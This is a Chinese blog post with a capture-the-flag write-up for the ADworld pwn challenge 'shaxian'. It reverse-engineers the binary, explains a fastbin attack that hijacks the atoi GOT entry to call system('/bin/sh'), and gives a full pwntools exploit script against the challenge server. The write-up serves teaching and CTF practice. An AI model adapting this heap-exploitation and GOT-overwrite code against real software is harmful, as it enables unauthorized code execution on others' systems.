ADworld pwn wp - shaxian

最新推荐文章于 2022-03-31 00:48:46 发布
最新推荐文章于 2022-03-31 00:48:46 发布
阅读量116 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120260937
版权

前言

fastbin attack, 劫持got表

分析过程

在这里插入图片描述

int __cdecl main()
{
  int result; // eax
  int v1; // [esp+1Ch] [ebp-4h]

  alarm(0x1Eu);
  SetBuf();
  title();
  info();
  while ( 2 )
  {
    menu();
    v1 = input();
    if ( v1 == -1 )
      return 0;
    switch ( v1 )
    {
      case 1:
        Dian_Cai();
        continue;
      case 2:
        Submit();
        continue;
      case 3:
        Receipt();
        continue;
      case 4:
        Review();
        continue;
      case 5:
        result = 0;
        break;
      default:
        puts("Invalid choice!");
        fflush(stdout);
        continue;
    }
    break;
  }
  return result;
}

老规矩, 每个函数读一读, 发现在第一个分支函数里有溢出漏洞
在这里插入图片描述

第二个分支函数(submit), 也就是free, 清空后没有将指针置零
在这里插入图片描述
后边有一个review函数回显, 可以泄露信息

int sub_8048A20()
{
  int v1; // [esp+1Ch] [ebp-Ch]

  v1 = dword_804B1C0;
  if ( dword_804B2E0 )
  {
    puts("Cart:");
    while ( v1 )
    {
      printf("%s * %d\n", (v1 + 4), *v1);
      v1 = *(v1 + 36);
    }
    printf("Total:%d\n", dword_804B2E0);
  }
  else
  {
    puts("Nothing in cart");
  }
  printf("Address:%s\n", byte_804B1E0);
  printf("Phone:%s\n", byte_804B0C0);
  return printf("Title:%s\n", byte_804B300);
}

逆向出点菜的结构体

struct CAI{
	int count;
	char s[32];
	struct CAI *next;
}

仔细看看程序逻辑, 程序是用头插法建立链表, 维护chunk
在这里插入图片描述

释放就是按链表自头向尾依次释放
在这里插入图片描述

漏洞利用

可以采用fastbin attack的方式, 控制chunk0溢出到chunk1, 修改chunk1的fd指针到链表头伪造一个chunk, 通过伪造的chunk控制链表头指针0x804B1C0, 这一步是通过phone number的输入实现
在这里插入图片描述

在这里插入图片描述

控制了指针0x804B1C0, 这样按照原程序逻辑走, 就会在add(str(system_addr - 0x100000000),cyclic(4) + p32(atoi_got))时, 将atoi_got改成system的地址, system_addr - 0x100000000是适应got表地址做出的调整 ( ?

在这里插入图片描述
修改了got表, 下一次发送"/bin/sh\x00"就可以调用system("/bin/sh")

exp

from LibcSearcher import LibcSearcher
from pwn import *
from pwnlib.util.cyclic import cyclic

url, port = "111.200.241.244", 59964
filename = "./pwn"
elf = ELF(filename)
# libc = ELF("")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def BK():
    gdb.attach(io)
    pause()

def add(content, count):
   io.sendlineafter('choose:', '1')
   io.sendlineafter('5.Jianjiao', content)
   io.sendlineafter('How many?', count)
 
def delete():
   io.sendlineafter('choose:', '2')
 
def show():
   io.sendlineafter('choose:', '4')

def pwn():
    puts_got = elf.got["puts"]
    atoi_got = elf.got["atoi"] 
    ptr = 0x804B1C0

    payload = cyclic(0xF0) + p32(0) + p32(0x31)
    io.sendlineafter('Your Address:','falca')
    io.sendlineafter('Your Phone number:', payload)

    add("0", "10")
    add("1", "10")
    add("2", "10")
    delete()

    payload = cyclic(0x20) + p32(puts_got - 4) # printf("%s * %d\n", (v1 + 4), *v1);
    payload += p32(0) + p32(0x31) + p32(ptr-0x10)
    add(payload, "10") # recall chunk0
    show()
    io.recvuntil("* 10\n")
    puts_addr = u32(io.recv(4))

    libc = LibcSearcher("puts", puts_addr)
    libc_base = puts_addr - libc.dump("puts")
    system_addr = libc_base + libc.dump("system")
    log.info("libc base address: %#x" % libc_base)
    log.info("system address: %#x" % system_addr)

    add("1", "10") # recall chunk1
    add(cyclic(4) + p32(atoi_got), str(system_addr - 0x100000000))
    io.sendlineafter('choose:','/bin/sh\x00')

    io.interactive()

if __name__ == '__main__':
    pwn()

总结

难点

(1) 理解最后一个payload的运行过程, 是巧妙利用程序直接对0x804B1C0地址进行input操作的逻辑, 修改0x804B1C0就可以修改任意地址, 这是一个任意地址写的功能, 而逆推回去, 为了修改0x804B1C0, 就需要伪造chunk, 进而控制0x804B1C0指针, 所以整个漏洞利用思路就清晰了

卡点

(1) 16进制计算犯了shapi错误, 0x100 - 0x10 = 0x90 (= =

参考

https://blog.csdn.net/seaaseesa/article/details/104241759

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
在本文中,我们将深入探讨一个名为"adworld-wargame"的在线Pwn挑战,该挑战源自https://adworld.xctf.org.cn/task平台。这个挑战主要涉及Python编程语言,这意味着我们需要熟悉Python的内存管理和安全特性来成功解决...
[攻防世界 pwn]——pwn1(内涵peak小知识)
Y_peak的博客
02-28 613
[攻防世界 pwn]——pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇见printf函数,并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s,打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。 遇见可以利用的栈溢出gets函数,如果有puts函数,或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清
ADworld pwn wp - pwn1
fa1c4的blog
06-26 186
不过问题在于开了canary所以溢出有难度, 不过v6是canary保存的变量, 而且栈位置在s数组的高位, 所以可以通过puts()泄露出canary, puts函数是打印直到’\0’字符为止, 所以溢出可行, 劫持执行流到ROP泄露puts函数地址, 计算出libc基址, 然后调用execve() 这里用one_gadget, 坑点在于记得计算服务器上的execve地址 from pwn import * from pwnlib import context from pwnlib.util.c...
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
pwntools中fmtstr的使用
fa1c4的blog
02-01 3861
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
kali安装checksec
fa1c4的blog
01-26 3258
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3245
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3027
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2920
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
Ubuntu安装checksec
fa1c4的blog
04-15 2582
环境配置, 纯命令行解决. # install git sudo apt-get install git ### cd git clone https://github.com/slimm609/checksec.sh sudo ln -sf ~/checksec.sh/checksec /usr/local/bin/checksec 经测试, 适用大部分版本Ubuntu.
确认main_arena相对libc的偏移地址
fa1c4的blog
08-26 2511
前言 打保护全开的堆题时碰到的问题, 大佬wp直接给exp, 但是奈何萌新很多细节不懂啊 现在记录一下寻找main_arena相对libc偏移的方法(又水一篇博客) 在0CTF 2017 babyheap这题中, 利用 fast chunk 和 small chunk 堆叠技术将main_arena的实际地址泄露出来, 另外通过这个相对偏移, 计算libc的加载基址, 完成libc泄露 过程 对照看下mallo.c的源码 方法一 逆向分析libc.so文件 拖进IDA 函数框搜索malloc_trim
pwn远程打通本地打不通的“玄学“问题解释
fa1c4的blog
09-30 2381
前言 速刷buu pwn题的时候碰到的问题, 本来配置了16/18/20三个版本虚拟机, 加上pwndocker, 基本可以涵盖各个版本环境的需求, 不过做到一个栈的题的时候发现出现了本地打不通, 远程能通的情况, 本来以为是个人的玄学体质导致的玄学bug, 搜索了解释, 才发现是另一回事 问题 查看本地glibc环境, 结果选择正确的glibc版本, 依然打不通本地 解决 参考 https://blog.csdn.net/fjh1997/article/details/107695261 得知glib
gcc编译的保护机制选项
fa1c4的blog
02-02 1914
linux下有5中程序保护机制 CANNARY 栈保护 NX no-execute PIE(ASLR) position-independent executables位置独立可执行区域; address space layout randomization内存地址随机化机制 RELRO read only relocation FOURTYFY_SOURCE 常用的机制有前4种: CANNARY, NX, PIE(ASLR), RELRO (1) CANNARY gcc -o test test
BUUCTF pwn wp 126 - 130
fa1c4的blog
03-31 1719
gyctf_2020_document ciscn_2019_final_5 roarctf_2019_realloc_magic houseoforange_hitcon_2016 SWPUCTF_2019_login
NJCTF 2017-messager
fa1c4的blog
01-26 1373
先checksec 打开了partial RELRO, canary, NX 可以自建flag, 打本地 echo "flag{Mine}" > flag 运行, 然后netstat查看端口 port: 5555 分析main函数流程 是用socket通信, 其中有读取flag到buf的过程 sub_400BC6是发送flag, 所以要劫持的进程目的返回地址有了: 0x400BC6 利用fork的子进程与父进程同canary特性, 进行canary爆破, 拿到canary后覆盖返回地址劫持流程到s
BUUCTF pwn wp 51 - 55
fa1c4的blog
10-06 1367
wustctf2020_getshell_2 简单rop from pwn import * url, port = "node4.buuoj.cn", 25118 filename = "./wustctf2020_getshell_2" elf = ELF(filename) # libc = ELF("./") # context(arch="amd64", os="linux") context(arch="i386", os="linux") local = 0 if local:
pwnable.xyz wp 4 - 8
fa1c4的blog
08-11 1354
misalignment int __cdecl main(int argc, const char **argv, const char **envp) { __int64 s[20]; // [rsp+10h] [rbp-A0h] BYREF s[19] = __readfsqword(0x28u); setup(argc, argv, envp); memset(s, 0, 0x98uLL); *(__int64 *)((char *)&s[1] + 7) = 3735
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值